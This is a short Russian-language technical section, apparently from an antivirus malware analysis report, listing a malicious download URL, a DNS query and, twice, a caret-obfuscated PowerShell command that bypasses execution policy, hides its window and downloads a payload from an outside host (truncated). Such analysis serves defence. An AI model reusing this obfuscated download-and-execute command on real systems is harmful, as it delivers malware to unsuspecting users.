Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^ow^eRs^he^l^l^.e^xe^ -EX^ecuTi^o^nPOlicY b^y^pA^s^S^ ^-^N^o^PRO^fIL^e^ -wINdowS^TY^lE ^h^i^d^d^e^N^ (nEw^-^Obj^ec^t SYsTEm.ne^t.w^e^BC^li^ent).dO^Wnl^O^adFi^Le^(^'http://n...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "p^ow^eRs^he^l^l^.e^xe^ -EX^ecuTi^o^nPOlicY b^y^pA^s^S^ ^-^N^o^PRO^fIL^e^ -wINdowS^TY^lE ^h^i^d^d^e^N^ (nEw^-^Obj^ec^t SYsTEm.ne^t.w^e^BC^li^ent).dO^Wnl^O^adFi^Le^(^'http://n...' (со скрытым окном)